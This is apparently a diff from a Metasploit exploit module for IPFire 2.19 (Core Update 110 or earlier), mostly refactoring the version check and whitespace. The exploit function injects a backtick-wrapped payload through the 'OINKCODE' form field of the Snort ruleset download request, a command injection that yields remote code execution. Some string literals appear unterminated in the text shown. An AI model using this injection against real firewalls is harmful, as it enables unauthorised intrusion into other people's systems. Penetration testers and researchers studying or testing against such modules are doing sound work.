@@ -67,18 +67,20 @@ def check
6767 'authorization' => basic_auth ( datastore [ 'USERNAME' ] , datastore [ 'PASSWORD' ] )
6868 )
6969
70- if res and res . code == 200
70+ if res && res . code == 200
7171 /\< strong\> IPFire (?<version>[\d .]{4}) \( [\w ]+\) - Core Update (?<update>[\d ]+)/ =~ res . body
7272 end
73-
74- # now that we've pulled the info we need, check version.
75- if version && update && version == '2.19' && update . to_i <= 110
73+ if version . nil? || update . nil? || !Gem ::Version . correct? ( version )
74+ vprint_error ( 'No Recognizable Version Found' )
75+ CheckCode ::Safe
76+ elsif Gem ::Version . new ( version ) <= Gem ::Version . new ( '2.19' ) && update . to_i <= 110
7677 CheckCode ::Appears
7778 else
79+ vprint_error ( 'Version and/or Update Not Supported' )
7880 CheckCode ::Safe
7981 end
80-
8182 rescue ::Rex ::ConnectionError
83+ print_error ( "Connection Failed" )
8284 CheckCode ::Safe
8385 end
8486 end
@@ -97,20 +99,19 @@ def exploit
9799 'Referer' => "#{ datastore [ 'SSL' ] ? 'https' : 'http' } #{ datastore [ 'RHOST' ] } #{ datastore [ 'RPORT' ] }
98100 } ,
99101 'vars_post' => {
100- 'ENABLE_SNORT_GREEN' => 'on' ,
101- 'ENABLE_SNORT' => 'on' ,
102- 'RULES' => 'registered' ,
103- 'OINKCODE' => "`#{ payload . encoded } ,
104- 'ACTION' => 'Download new ruleset' ,
105- 'ACTION2' => 'snort'
102+ 'ENABLE_SNORT_GREEN' => 'on' ,
103+ 'ENABLE_SNORT' => 'on' ,
104+ 'RULES' => 'registered' ,
105+ 'OINKCODE' => "`#{ payload . encoded } ,
106+ 'ACTION' => 'Download new ruleset' ,
107+ 'ACTION2' => 'snort'
106108 }
107109 )
108110
109111 # success means we hang our session, and wont get back a response, so just check we get a response back
110- if res && res . code != 200
112+ if res && res . code != 200
111113 fail_with ( Failure ::UnexpectedReply , "#{ peer } #{ res . code } )
112114 end
113-
114115 rescue ::Rex ::ConnectionError
115116 fail_with ( Failure ::Unreachable , "#{ peer } )
116117 end
0 commit comments